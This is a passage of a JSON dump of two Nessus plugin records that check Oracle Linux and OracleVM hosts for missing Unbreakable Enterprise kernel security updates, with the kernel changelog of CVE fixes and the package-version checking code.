{CVE-2017-1000380}\n- ipv6/dccp: do not inherit ipv6_mc_list from parent (WANG Cong) \n[Orabug: 26404005] {CVE-2017-9077}\n- ocfs2: fix deadlock issue when taking inode lock at vfs entry points \n(Eric Ren) [Orabug: 26427126]\n- ocfs2/dlmglue: prepare tracking logic to avoid recursive cluster lock \n(Eric Ren) [Orabug: 26427126]\n- ping: implement proper locking (Eric Dumazet) [Orabug: 26540286] \n{CVE-2017-2671}\n- aio: mark AIO pseudo-fs noexec (Jann Horn) [Orabug: 26643598] \n{CVE-2016-10044}\n- vfs: Commit to never having exectuables on proc and sysfs. (Eric W. \nBiederman) [Orabug: 26643598] {CVE-2016-10044}\n- vfs, writeback: replace FS_CGROUP_WRITEBACK with SB_I_CGROUPWB (Tejun \nHeo) [Orabug: 26643598] {CVE-2016-10044}\n- x86/acpi: Prevent out of bound access caused by broken ACPI tables \n(Seunghun Han) [Orabug: 26643645] {CVE-2017-11473}\n- sctp: do not inherit ipv6_{mc|ac|fl}_list from parent (Eric Dumazet) \n[Orabug: 26650883] {CVE-2017-9075}\n- [media] saa7164: fix double fetch PCIe access condition (Steven Toth) \n[Orabug: 26675142] {CVE-2017-8831}\n- [media] saa7164: fix sparse warnings (Hans Verkuil) [Orabug: \n26675142] {CVE-2017-8831}\n- fs: __generic_file_splice_read retry lookup on AOP_TRUNCATED_PAGE \n(Abhi Das) [Orabug: 26797306]\n- timerfd: Protect the might cancel mechanism proper (Thomas Gleixner) \n[Orabug: 26899787] {CVE-2017-10661}\n- scsi: scsi_transport_iscsi: fix the issue that iscsi_if_rx doesn", "modified": "2019-12-02T00:00:00", "id": "ORACLELINUX_ELSA-2017-3657.NASL", "href": "https://www.tenable.com/plugins/nessus/105144", "published": "2017-12-11T00:00:00", "title": "Oracle Linux 6 / 7 : Unbreakable Enterprise kernel (ELSA-2017-3657) (BlueBorne) (Stack Clash)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Oracle Linux Security Advisory ELSA-2017-3657.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(105144);\n script_version(\"3.12\");\n script_cvs_date(\"Date: 2019/09/27 13:00:38\");\n\n script_cve_id(\"CVE-2016-10044\", \"CVE-2016-10200\", \"CVE-2016-7097\", \"CVE-2016-9604\", \"CVE-2016-9685\", \"CVE-2017-1000111\", \"CVE-2017-1000251\", \"CVE-2017-1000363\", \"CVE-2017-1000365\", \"CVE-2017-1000380\", \"CVE-2017-10661\", \"CVE-2017-11176\", \"CVE-2017-11473\", \"CVE-2017-12134\", \"CVE-2017-12190\", \"CVE-2017-14489\", \"CVE-2017-2671\", \"CVE-2017-7542\", \"CVE-2017-7645\", \"CVE-2017-7889\", \"CVE-2017-8831\", \"CVE-2017-9075\", \"CVE-2017-9077\", \"CVE-2017-9242\");\n\n script_name(english:\"Oracle Linux 6 / 7 : Unbreakable Enterprise kernel (ELSA-2017-3657) (BlueBorne) (Stack Clash)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Description of changes:\n\n[3.8.13-118.20.1.el7uek]\n- tty: Fix race in pty_write() leading to NULL deref (Todd Vierling) \n[Orabug: 25392692]\n- ocfs2/dlm: ignore cleaning the migration mle that is inuse (xuejiufei) \n [Orabug: 26479780]\n- KEYS: fix dereferencing NULL payload with nonzero length (Eric \nBiggers) [Orabug: 26592025]\n- oracleasm: Copy the integrity descriptor (Martin K. Petersen) \n[Orabug: 26649818]\n- mm: Tighten x86 /dev/mem with zeroing reads (Kees Cook) [Orabug: \n26675925] {CVE-2017-7889}\n- xscore: add dma address check (Zhu Yanjun) [Orabug: 27058468]\n- more bio_map_user_iov() leak fixes (Al Viro) [Orabug: 27069042] \n{CVE-2017-12190}\n- fix unbalanced page refcounting in bio_map_user_iov (Vitaly \nMayatskikh) [Orabug: 27069042] {CVE-2017-12190}\n- nvme: Drop nvmeq->q_lock before dma_pool_alloc(), so as to prevent \nhard lockups (Aruna Ramakrishna) [Orabug: 25409587]\n- nvme: Handle PM1725 HIL reset (Martin K. Petersen) [Orabug: 26277600]\n- char: lp: fix possible integer overflow in lp_setup() (Willy Tarreau) \n[Orabug: 26403940] {CVE-2017-1000363}\n- ALSA: timer: Fix missing queue indices reset at \nSNDRV_TIMER_IOCTL_SELECT (Takashi Iwai) [Orabug: 26403956] \n{CVE-2017-1000380}\n- ALSA: timer: Fix race between read and ioctl (Takashi Iwai) [Orabug: \n26403956] {CVE-2017-1000380}\n- ALSA: timer: fix NULL pointer dereference in read()/ioctl() race \n(Vegard Nossum) [Orabug: 26403956] {CVE-2017-1000380}\n- ALSA: timer: Fix negative queue usage by racy accesses (Takashi Iwai) \n[Orabug: 26403956] {CVE-2017-1000380}\n- ALSA: timer: Fix race at concurrent reads (Takashi Iwai) [Orabug: \n26403956] {CVE-2017-1000380}\n- ALSA: timer: Fix race among timer ioctls (Takashi Iwai) [Orabug: \n26403956] {CVE-2017-1000380}\n- ipv6/dccp: do not inherit ipv6_mc_list from parent (WANG Cong) \n[Orabug: 26404005] {CVE-2017-9077}\n- ocfs2: fix deadlock issue when taking inode lock at vfs entry points \n(Eric Ren) [Orabug: 26427126]\n- ocfs2/dlmglue: prepare tracking logic to avoid recursive cluster lock \n(Eric Ren) [Orabug: 26427126]\n- ping: implement proper locking (Eric Dumazet) [Orabug: 26540286] \n{CVE-2017-2671}\n- aio: mark AIO pseudo-fs noexec (Jann Horn) [Orabug: 26643598] \n{CVE-2016-10044}\n- vfs: Commit to never having exectuables on proc and sysfs. (Eric W. \nBiederman) [Orabug: 26643598] {CVE-2016-10044}\n- vfs, writeback: replace FS_CGROUP_WRITEBACK with SB_I_CGROUPWB (Tejun \nHeo) [Orabug: 26643598] {CVE-2016-10044}\n- x86/acpi: Prevent out of bound access caused by broken ACPI tables \n(Seunghun Han) [Orabug: 26643645] {CVE-2017-11473}\n- sctp: do not inherit ipv6_{mc|ac|fl}_list from parent (Eric Dumazet) \n[Orabug: 26650883] {CVE-2017-9075}\n- [media] saa7164: fix double fetch PCIe access condition (Steven Toth) \n[Orabug: 26675142] {CVE-2017-8831}\n- [media] saa7164: fix sparse warnings (Hans Verkuil) [Orabug: \n26675142] {CVE-2017-8831}\n- fs: __generic_file_splice_read retry lookup on AOP_TRUNCATED_PAGE \n(Abhi Das) [Orabug: 26797306]\n- timerfd: Protect the might cancel mechanism proper (Thomas Gleixner) \n[Orabug: 26899787] {CVE-2017-10661}\n- scsi: scsi_transport_iscsi: fix the issue that iscsi_if_rx doesn't \nparse nlmsg properly (Xin Long) [Orabug: 26988627] {CVE-2017-14489}\n- mqueue: fix a use-after-free in sys_mq_notify() (Cong Wang) [Orabug: \n26643556] {CVE-2017-11176}\n- ipv6: avoid overflow of offset in ip6_find_1stfragopt (Sabrina \nDubroca) [Orabug: 27011273] {CVE-2017-7542}\n- packet: fix tp_reserve race in packet_set_ring (Willem de Bruijn) \n[Orabug: 27002450] {CVE-2017-1000111}\n- mlx4_core: calculate log_num_mtt based on total system memory (Wei Lin \nGuay) [Orabug: 26883934]\n- xen/x86: Add interface for querying amount of host memory (Boris \nOstrovsky) [Orabug: 26883934]\n- Bluetooth: Properly check L2CAP config option output buffer length \n(Ben Seri) [Orabug: 26796364] {CVE-2017-1000251}\n- xen: fix bio vec merging (Roger Pau Monne) [Orabug: 26645550] \n{CVE-2017-12134}\n- fs/exec.c: account for argv/envp pointers (Kees Cook) [Orabug: \n26638921] {CVE-2017-1000365} {CVE-2017-1000365}\n- l2tp: fix racy SOCK_ZAPPED flag check in l2tp_ip{,6}_bind() (Guillaume \nNault) [Orabug: 26586047] {CVE-2016-10200}\n- xfs: fix two memory leaks in xfs_attr_list.c error paths (Mateusz \nGuzik) [Orabug: 26586022] {CVE-2016-9685}\n- KEYS: Disallow keyrings beginning with '.' to be joined as session \nkeyrings (David Howells) [Orabug: 26585994] {CVE-2016-9604}\n- ipv6: fix out of bound writes in __ip6_append_data() (Eric Dumazet) \n[Orabug: 26578198] {CVE-2017-9242}\n- posix_acl: Clear SGID bit when setting file permissions (Jan Kara) \n[Orabug: 25507344] {CVE-2016-7097} {CVE-2016-7097}\n- nfsd: check for oversized NFSv2/v3 arguments (J. Bruce Fields) \n[Orabug: 26366022] {CVE-2017-7645}\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2017-December/007407.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2017-December/007408.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected unbreakable enterprise kernel packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:A/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:dtrace-modules-3.8.13-118.20.1.el6uek\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:dtrace-modules-3.8.13-118.20.1.el7uek\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-firmware\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:7\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/10/16\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/12/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/12/11\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\ninclude(\"ksplice.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(6|7)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 6 / 7\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\nif (\"x86_64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2016-10044\", \"CVE-2016-10200\", \"CVE-2016-7097\", \"CVE-2016-9604\", \"CVE-2016-9685\", \"CVE-2017-1000111\", \"CVE-2017-1000251\", \"CVE-2017-1000363\", \"CVE-2017-1000365\", \"CVE-2017-1000380\", \"CVE-2017-10661\", \"CVE-2017-11176\", \"CVE-2017-11473\", \"CVE-2017-12134\", \"CVE-2017-12190\", \"CVE-2017-14489\", \"CVE-2017-2671\", \"CVE-2017-7542\", \"CVE-2017-7645\", \"CVE-2017-7889\", \"CVE-2017-8831\", \"CVE-2017-9075\", \"CVE-2017-9077\", \"CVE-2017-9242\"); \n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for ELSA-2017-3657\");\n }\n else\n {\n __rpm_report = ksplice_reporting_text();\n }\n}\n\nkernel_major_minor = get_kb_item(\"Host/uname/major_minor\");\nif (empty_or_null(kernel_major_minor)) exit(1, \"Unable to determine kernel major-minor level.\");\nexpected_kernel_major_minor = \"3.8\";\nif (kernel_major_minor != expected_kernel_major_minor)\n audit(AUDIT_OS_NOT, \"running kernel level \" + expected_kernel_major_minor + \", it is running kernel level \" + kernel_major_minor);\n\nflag = 0;\nif (rpm_check(release:\"EL6\", cpu:\"x86_64\", reference:\"dtrace-modules-3.8.13-118.20.1.el6uek-0.4.5-3.el6\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-3.8.13\") && rpm_check(release:\"EL6\", cpu:\"x86_64\", reference:\"kernel-uek-3.8.13-118.20.1.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-debug-3.8.13\") && rpm_check(release:\"EL6\", cpu:\"x86_64\", reference:\"kernel-uek-debug-3.8.13-118.20.1.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-debug-devel-3.8.13\") && rpm_check(release:\"EL6\", cpu:\"x86_64\", reference:\"kernel-uek-debug-devel-3.8.13-118.20.1.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-devel-3.8.13\") && rpm_check(release:\"EL6\", cpu:\"x86_64\", reference:\"kernel-uek-devel-3.8.13-118.20.1.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-doc-3.8.13\") && rpm_check(release:\"EL6\", cpu:\"x86_64\", reference:\"kernel-uek-doc-3.8.13-118.20.1.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-firmware-3.8.13\") && rpm_check(release:\"EL6\", cpu:\"x86_64\", reference:\"kernel-uek-firmware-3.8.13-118.20.1.el6uek\")) flag++;\n\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"dtrace-modules-3.8.13-118.20.1.el7uek-0.4.5-3.el7\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-uek-3.8.13\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-uek-3.8.13-118.20.1.el7uek\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-uek-debug-3.8.13\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-uek-debug-3.8.13-118.20.1.el7uek\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-uek-debug-devel-3.8.13\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-uek-debug-devel-3.8.13-118.20.1.el7uek\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-uek-devel-3.8.13\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-uek-devel-3.8.13-118.20.1.el7uek\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-uek-doc-3.8.13\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-uek-doc-3.8.13-118.20.1.el7uek\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-uek-firmware-3.8.13\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-uek-firmware-3.8.13-118.20.1.el7uek\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"affected kernel\");\n}\n", "cvss": {"score": 8.3, "vector": "AV:A/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-12-13T08:50:19", "bulletinFamily": "scanner", "description": "The remote OracleVM system is missing necessary patches to address\ncritical security updates :\n\n - tty: Fix race in pty_write leading to NULL deref (Todd\n Vierling) \n\n - ocfs2/dlm: ignore cleaning the migration mle that is\n inuse (xuejiufei) [Orabug: 26479780]\n\n - KEYS: fix dereferencing NULL payload with nonzero length\n (Eric Biggers) [Orabug: 26592025]\n\n - oracleasm: Copy the integrity descriptor (Martin K.\n Petersen) \n\n - mm: Tighten x86 /dev/mem with zeroing reads (Kees Cook)\n [Orabug: 26675925] (CVE-2017-7889)\n\n - xscore: add dma address check (Zhu Yanjun) [Orabug:\n 27058468]\n\n - more bio_map_user_iov leak fixes (Al Viro) [Orabug:\n 27069042] (CVE-2017-12190)\n\n - fix unbalanced page refcounting in bio_map_user_iov\n (Vitaly Mayatskikh) [Orabug: 27069042] (CVE-2017-12190)\n\n - nvme: Drop nvmeq->q_lock before dma_pool_alloc, so as to\n prevent hard lockups (Aruna Ramakrishna) [Orabug:\n 25409587]\n\n - nvme: Handle PM1725 HIL reset (Martin K. Petersen)\n [Orabug: 26277600]\n\n - char: lp: fix possible integer overflow in lp_setup\n (Willy Tarreau) [Orabug: 26403940] (CVE-2017-1000363)\n\n - ALSA: timer: Fix missing queue indices reset at\n SNDRV_TIMER_IOCTL_SELECT (Takashi Iwai) [Orabug:\n 26403956] (CVE-2017-1000380)\n\n - ALSA: timer: Fix race between read and ioctl (Takashi\n Iwai) [Orabug: 26403956] (CVE-2017-1000380)\n\n - ALSA: timer: fix NULL pointer dereference in read/ioctl\n race (Vegard Nossum) [Orabug: 26403956]\n (CVE-2017-1000380)\n\n - ALSA: timer: Fix negative queue usage by racy accesses\n (Takashi Iwai) [Orabug: 26403956] (CVE-2017-1000380)\n\n - ALSA: timer: Fix race at concurrent reads (Takashi Iwai)\n [Orabug: 26403956] (CVE-2017-1000380)\n\n - ALSA: timer: Fix race among timer ioctls (Takashi Iwai)\n [Orabug: 26403956] (CVE-2017-1000380)\n\n - ipv6/dccp: do not inherit ipv6_mc_list from parent (WANG\n Cong) [Orabug: 26404005] (CVE-2017-9077)\n\n - ocfs2: fix deadlock issue when taking inode lock at vfs\n entry points (Eric Ren) [Orabug: 26427126]\n\n - ocfs2/dlmglue: prepare tracking logic to avoid recursive\n cluster lock (Eric Ren) [Orabug: 26427126]\n\n - ping: implement proper locking (Eric Dumazet) [Orabug:\n 26540286] (CVE-2017-2671)\n\n - aio: mark AIO pseudo-fs noexec (Jann Horn) [Orabug:\n 26643598] (CVE-2016-10044)\n\n - vfs: Commit to never having exectuables on proc and\n sysfs. (Eric W. Biederman) [Orabug: 26643598]\n (CVE-2016-10044)\n\n - vfs, writeback: replace FS_CGROUP_WRITEBACK with\n SB_I_CGROUPWB (Tejun Heo) [Orabug: 26643598]\n (CVE-2016-10044)\n\n - x86/acpi: Prevent out of bound access caused by broken\n ACPI tables (Seunghun Han) [Orabug: 26643645]\n (CVE-2017-11473)\n\n - sctp: do not inherit ipv6_[mc|ac|fl]_list from parent\n (Eric Dumazet) [Orabug: 26650883] (CVE-2017-9075)\n\n - [media] saa7164: fix double fetch PCIe access condition\n (Steven Toth) [Orabug: 26675142] (CVE-2017-8831)\n\n - [media] saa7164: fix sparse warnings (Hans Verkuil)\n [Orabug: 26675142] (CVE-2017-8831)\n\n - fs: __generic_file_splice_read retry lookup on\n AOP_TRUNCATED_PAGE (Abhi Das) [Orabug: 26797306]\n\n - timerfd: Protect the might cancel mechanism proper\n (Thomas Gleixner) [Orabug: 26899787] (CVE-2017-10661)\n\n - scsi: scsi_transport_iscsi: fix the issue that\n iscsi_if_rx doesn", "modified": "2019-12-02T00:00:00", "id": "ORACLEVM_OVMSA-2017-0173.NASL", "href": "https://www.tenable.com/plugins/nessus/105147", "published": "2017-12-11T00:00:00", "title": "OracleVM 3.3 : Unbreakable / etc (OVMSA-2017-0173) (BlueBorne) (Stack Clash)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The package checks in this plugin were extracted from OracleVM\n# Security Advisory OVMSA-2017-0173.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(105147);\n script_version(\"3.5\");\n script_cvs_date(\"Date: 2019/09/27 13:00:35\");\n\n script_cve_id(\"CVE-2016-10044\", \"CVE-2016-10200\", \"CVE-2016-7097\", \"CVE-2016-9604\", \"CVE-2016-9685\", \"CVE-2017-1000111\", \"CVE-2017-1000251\", \"CVE-2017-1000363\", \"CVE-2017-1000365\", \"CVE-2017-1000380\", \"CVE-2017-10661\", \"CVE-2017-11176\", \"CVE-2017-11473\", \"CVE-2017-12134\", \"CVE-2017-12190\", \"CVE-2017-14489\", \"CVE-2017-2671\", \"CVE-2017-7542\", \"CVE-2017-7645\", \"CVE-2017-7889\", \"CVE-2017-8831\", \"CVE-2017-9075\", \"CVE-2017-9077\", \"CVE-2017-9242\");\n\n script_name(english:\"OracleVM 3.3 : Unbreakable / etc (OVMSA-2017-0173) (BlueBorne) (Stack Clash)\");\n script_summary(english:\"Checks the RPM output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote OracleVM host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote OracleVM system is missing necessary patches to address\ncritical security updates :\n\n - tty: Fix race in pty_write leading to NULL deref (Todd\n Vierling) \n\n - ocfs2/dlm: ignore cleaning the migration mle that is\n inuse (xuejiufei) [Orabug: 26479780]\n\n - KEYS: fix dereferencing NULL payload with nonzero length\n (Eric Biggers) [Orabug: 26592025]\n\n - oracleasm: Copy the integrity descriptor (Martin K.\n Petersen) \n\n - mm: Tighten x86 /dev/mem with zeroing reads (Kees Cook)\n [Orabug: 26675925] (CVE-2017-7889)\n\n - xscore: add dma address check (Zhu Yanjun) [Orabug:\n 27058468]\n\n - more bio_map_user_iov leak fixes (Al Viro) [Orabug:\n 27069042] (CVE-2017-12190)\n\n - fix unbalanced page refcounting in bio_map_user_iov\n (Vitaly Mayatskikh) [Orabug: 27069042] (CVE-2017-12190)\n\n - nvme: Drop nvmeq->q_lock before dma_pool_alloc, so as to\n prevent hard lockups (Aruna Ramakrishna) [Orabug:\n 25409587]\n\n - nvme: Handle PM1725 HIL reset (Martin K. Petersen)\n [Orabug: 26277600]\n\n - char: lp: fix possible integer overflow in lp_setup\n (Willy Tarreau) [Orabug: 26403940] (CVE-2017-1000363)\n\n - ALSA: timer: Fix missing queue indices reset at\n SNDRV_TIMER_IOCTL_SELECT (Takashi Iwai) [Orabug:\n 26403956] (CVE-2017-1000380)\n\n - ALSA: timer: Fix race between read and ioctl (Takashi\n Iwai) [Orabug: 26403956] (CVE-2017-1000380)\n\n - ALSA: timer: fix NULL pointer dereference in read/ioctl\n race (Vegard Nossum) [Orabug: 26403956]\n (CVE-2017-1000380)\n\n - ALSA: timer: Fix negative queue usage by racy accesses\n (Takashi Iwai) [Orabug: 26403956] (CVE-2017-1000380)\n\n - ALSA: timer: Fix race at concurrent reads (Takashi Iwai)\n [Orabug: 26403956] (CVE-2017-1000380)\n\n - ALSA: timer: Fix race among timer ioctls (Takashi Iwai)\n [Orabug: 26403956] (CVE-2017-1000380)\n\n - ipv6/dccp: do not inherit ipv6_mc_list from parent (WANG\n Cong) [Orabug: 26404005] (CVE-2017-9077)\n\n - ocfs2: fix deadlock issue when taking inode lock at vfs\n entry points (Eric Ren) [Orabug: 26427126]\n\n - ocfs2/dlmglue: prepare tracking logic to avoid recursive\n cluster lock (Eric Ren) [Orabug: 26427126]\n\n - ping: implement proper locking (Eric Dumazet) [Orabug:\n 26540286] (CVE-2017-2671)\n\n - aio: mark AIO pseudo-fs noexec (Jann Horn) [Orabug:\n 26643598] (CVE-2016-10044)\n\n - vfs: Commit to never having exectuables on proc and\n sysfs. (Eric W. Biederman) [Orabug: 26643598]\n (CVE-2016-10044)\n\n - vfs, writeback: replace FS_CGROUP_WRITEBACK with\n SB_I_CGROUPWB (Tejun Heo) [Orabug: 26643598]\n (CVE-2016-10044)\n\n - x86/acpi: Prevent out of bound access caused by broken\n ACPI tables (Seunghun Han) [Orabug: 26643645]\n (CVE-2017-11473)\n\n - sctp: do not inherit ipv6_[mc|ac|fl]_list from parent\n (Eric Dumazet) [Orabug: 26650883] (CVE-2017-9075)\n\n - [media] saa7164: fix double fetch PCIe access condition\n (Steven Toth) [Orabug: 26675142] (CVE-2017-8831)\n\n - [media] saa7164: fix sparse warnings (Hans Verkuil)\n [Orabug: 26675142] (CVE-2017-8831)\n\n - fs: __generic_file_splice_read retry lookup on\n AOP_TRUNCATED_PAGE (Abhi Das) [Orabug: 26797306]\n\n - timerfd: Protect the might cancel mechanism proper\n (Thomas Gleixner) [Orabug: 26899787] (CVE-2017-10661)\n\n - scsi: scsi_transport_iscsi: fix the issue that\n iscsi_if_rx doesn't parse nlmsg properly (Xin Long)\n [Orabug: 26988627] (CVE-2017-14489)\n\n - mqueue: fix a use-after-free in sys_mq_notify (Cong\n Wang) [Orabug: 26643556] (CVE-2017-11176)\n\n - ipv6: avoid overflow of offset in ip6_find_1stfragopt\n (Sabrina Dubroca) [Orabug: 27011273] (CVE-2017-7542)\n\n - packet: fix tp_reserve race in packet_set_ring (Willem\n de Bruijn) [Orabug: 27002450] (CVE-2017-1000111)\n\n - mlx4_core: calculate log_num_mtt based on total system\n memory (Wei Lin Guay) [Orabug: 26883934]\n\n - xen/x86: Add interface for querying amount of host\n memory (Boris Ostrovsky) [Orabug: 26883934]\n\n - Bluetooth: Properly check L2CAP config option output\n buffer length (Ben Seri) [Orabug: 26796364]\n (CVE-2017-1000251)\n\n - xen: fix bio vec merging (Roger Pau Monne) [Orabug:\n 26645550] (CVE-2017-12134)\n\n - fs/exec.c: account for argv/envp pointers (Kees Cook)\n [Orabug: 26638921] (CVE-2017-1000365) (CVE-2017-1000365)\n\n - l2tp: fix racy SOCK_ZAPPED flag check in\n l2tp_ip[,6]_bind (Guillaume Nault) [Orabug: 26586047]\n (CVE-2016-10200)\n\n - xfs: fix two memory leaks in xfs_attr_list.c error paths\n (Mateusz Guzik) [Orabug: 26586022] (CVE-2016-9685)\n\n - KEYS: Disallow keyrings beginning with '.' to be joined\n as session keyrings (David Howells) [Orabug: 26585994]\n (CVE-2016-9604)\n\n - ipv6: fix out of bound writes in __ip6_append_data (Eric\n Dumazet) [Orabug: 26578198] (CVE-2017-9242)\n\n - posix_acl: Clear SGID bit when setting file permissions\n (Jan Kara) [Orabug: 25507344] (CVE-2016-7097)\n (CVE-2016-7097)\n\n - nfsd: check for oversized NFSv2/v3 arguments (J. Bruce\n Fields) [Orabug: 26366022] (CVE-2017-7645)\"\n );\n # https://oss.oracle.com/pipermail/oraclevm-errata/2017-December/000804.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?08785912\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected kernel-uek / kernel-uek-firmware packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:A/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:vm:kernel-uek\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:vm:kernel-uek-firmware\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:vm_server:3.3\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/10/16\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/12/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/12/11\");\n script_set_attribute(attribute:\"in_the_news\", 